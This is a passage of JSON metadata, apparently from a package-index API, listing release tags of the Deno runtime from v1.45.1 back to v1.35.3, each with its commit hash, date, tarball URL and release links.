024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","dow